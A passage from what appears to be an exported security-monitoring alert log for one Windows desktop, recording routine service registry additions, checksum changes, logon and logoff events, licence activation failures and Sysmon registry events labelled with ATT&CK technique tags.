+", +"Apr 24, 2020 @ 10:27:18.727",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_3ea3f\Security' was added. +", +"Apr 24, 2020 @ 10:27:18.664",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_3ea3f' was added. +", +"Apr 24, 2020 @ 10:27:18.636",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_3ea3f\Security' was added. +", +"Apr 24, 2020 @ 10:27:16.430",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3ea3f' was added. +", +"Apr 24, 2020 @ 10:27:16.414",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3ea3f\TriggerInfo\4' was added. +", +"Apr 24, 2020 @ 10:27:16.398",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3ea3f\TriggerInfo\3' was added. +", +"Apr 24, 2020 @ 10:27:16.383",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3ea3f\TriggerInfo\2' was added. +", +"Apr 24, 2020 @ 10:27:16.369",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3ea3f\TriggerInfo\1' was added. +", +"Apr 24, 2020 @ 10:27:16.352",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3ea3f\TriggerInfo\0' was added. +", +"Apr 24, 2020 @ 10:27:16.336",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3ea3f\Security' was added. +", +"Apr 24, 2020 @ 10:27:15.211",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_3ea3f' was added. 
+", +"Apr 24, 2020 @ 10:27:15.196",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_3ea3f\Security' was added. +", +"Apr 24, 2020 @ 10:27:14.964",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. +Old md5sum was: 'c6ea3bd2e15bcf416c8f2d61c71010e3' +New md5sum is : 'e0fb41b6c9ef5abaa572c1ef6afa603d' +Old sha1sum was: '354a2b1d73f9ad4870cd65daf2b8156d72521032' +New sha1sum is : '0c93b761e97e5159ee7fbe552b27ab84daa6889c' +", +"Apr 24, 2020 @ 10:27:14.947",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '1c4e04d793df8bd371434698d7441beb' +New md5sum is : '164ddf65a0229b0a5673d9643fd360a5' +Old sha1sum was: '445eb561728c2ed4b3dc1e1f8173bdf8acae870c' +New sha1sum is : 'abc03ba9189e8ab0e57d2f28ac2a9479d27eb1de' +", +"Apr 24, 2020 @ 10:27:14.915",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: '8776cf6928f2de374d1a329d7b0948c3' +New md5sum is : '9b2eb62ca4c74330ffa1448b22e6dfac' +Old sha1sum was: '520ae6cd4e088c14c27c500ba09b18024715ec29' +New sha1sum is : '9ae0bb56b661cb86cac596f8cf95cde5c871458b' +", +"Apr 24, 2020 @ 10:27:12.369",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_3ea3f' was added. +", +"Apr 24, 2020 @ 10:27:12.354",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_3ea3f\Security' was added. +", +"Apr 24, 2020 @ 10:26:55.914",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T10:24:54Z. 
Reason: RulesEngine.""" +"Apr 24, 2020 @ 10:26:45.680",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. 
+ - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 10:26:30.849",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. 
Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 10:26:07.225",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Security\Policy\PolAdtEv' checksum changed. +Old md5sum was: 'b40de87500ee3eed90c2ce3ce8c7946f' +New md5sum is : '9d15aff4d26f802c3c4d3d74a00d8d4d' +Old sha1sum was: '2f6e6dd0efd148b1c11d33c91e9cea4a97a84792' +New sha1sum is : '11f3afa3902d0fadfcc52e4c051995f536c7d4e2' +", +"Apr 24, 2020 @ 10:25:55.519",5,"License Activation (slui.exe) failed",,"""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: +RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=TimerEvent""" +"Apr 24, 2020 @ 10:25:55.485",3,"Windows Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. 
+ - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 10:25:55.422",5,"License Activation (slui.exe) failed",,"""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: +RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=NetworkAvailable""" +"Apr 24, 2020 @ 10:25:52.548",5,"License Activation (slui.exe) failed",,"""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: +RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=UserLogon;SessionId=1""" +"Apr 24, 2020 @ 10:25:52.283",3,"Windows User Logoff",,"""An account was logged off. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x864E9 + +Logon Type: 2 + +This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.""" +"Apr 24, 2020 @ 10:25:52.253",3,"Windows User Logoff",,"""An account was logged off. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x86508 + +Logon Type: 2 + +This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. 
Logon IDs are only unique between reboots on the same computer.""" +"Apr 24, 2020 @ 10:25:52.213",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: No + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x86508 + Linked Logon ID: 0x864E9 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x154 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. 
+ +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 10:25:52.189",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x864E9 + Linked Logon ID: 0x86508 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x154 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). 
+ +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 10:25:47.284",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (66)",, +"Apr 24, 2020 @ 10:25:44.264",3,"The Windows Search Service started",,"""The Windows Search Service started. +""" +"Apr 24, 2020 @ 10:25:44.181",3,"Windows Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. 
+ - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 10:25:44.149",3,"The database engine attached a database",,"""SearchIndexer (4468,D,50) Windows: The database engine attached a database (1, C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb). (Time=0 seconds) + +Saved Cache: 0 0 +Additional Data: lgposAttach = 00000013:00DB:0268, +dbv = 1568.20.0 + +Internal Timing Sequence: +[1] 0.000008 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[2] 0.080503 -0.080241 (1) WT +J(0) +M(C:0K, Fs:25, WS:36K # 0K, PF:32K # 0K, P:32K) +[3] 0.096983 -0.066686 (5) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:3480/2) +M(C:0K, Fs:42, WS:124K # 0K, PF:148K # 0K, P:148K) +[4] 0.000100 +J(0) +[5] - +[6] - +[7] - +[8] 0.016881 -0.000653 (2) CM +J(CM:2, PgRf:2, Rd:14/2, Dy:0/0, Lg:0/0) +M(C:0K, Fs:52, WS:208K # 0K, PF:660K # 0K, P:660K) +[9] 0.086385 -0.000192 (5) CM -0.085901 (1) WT +J(CM:5, PgRf:23, Rd:0/5, Dy:0/0, Lg:0/0) +M(C:0K, Fs:67, WS:268K # 0K, PF:256K # 132K, P:256K) +[10] 0.000319 -0.000195 (1) CM +J(CM:1, PgRf:40, Rd:0/1, Dy:0/0, Lg:0/0) +M(C:0K, Fs:11, WS:44K # 8K, PF:96K # 96K, P:96K) +[11] 0.000017 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:4, WS:16K # 16K, PF:0K # 0K, P:0K) +[12] 0.000052 +J(CM:0, PgRf:42, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:3, WS:12K # 12K, PF:0K # 0K, P:0K) +[13] 0.000001 +J(0) +[14] 0.000001 +J(0) +[15] 0.000008 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0).""" +"Apr 24, 2020 @ 10:25:44.058",3,"The database engine is starting a new instance",,"""SearchIndexer (4468,P,98) Windows: The database engine (10.00.18363.0000) is starting a new instance (0).""" +"Apr 24, 2020 @ 10:25:42.236",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",, +"Apr 24, 
2020 @ 10:25:40.879",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:35.473847400Z"",""eventRecordID"":""545"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:35.414\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\TabletInputService\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:35.414"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\TabletInputService\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:35.414 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\TabletInputService\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 10:25:40.712",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:35.021631700Z"",""eventRecordID"":""539"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.962\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WpnUserService_3ea3f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.962"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WpnUserService_3ea3f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.962 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\WpnUserService_3ea3f\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 10:25:40.686",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:35.021301500Z"",""eventRecordID"":""538"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.962\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WpnUserService_3ea3f\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.962"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WpnUserService_3ea3f\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.962 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\WpnUserService_3ea3f\Start +Details: DWORD (0x00000002)""" +"Apr 24, 2020 @ 10:25:40.642",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:35.019949100Z"",""eventRecordID"":""537"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.962\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UserDataSvc_3ea3f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.962"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UserDataSvc_3ea3f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.962 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UserDataSvc_3ea3f\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 10:25:40.637",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:35.019560900Z"",""eventRecordID"":""536"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.962\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UserDataSvc_3ea3f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.962"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UserDataSvc_3ea3f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.962 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UserDataSvc_3ea3f\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 10:25:40.583",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:35.017993100Z"",""eventRecordID"":""535"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.962\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UnistoreSvc_3ea3f\\ImagePath\r\nDetails: C:\\Windows\\System32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 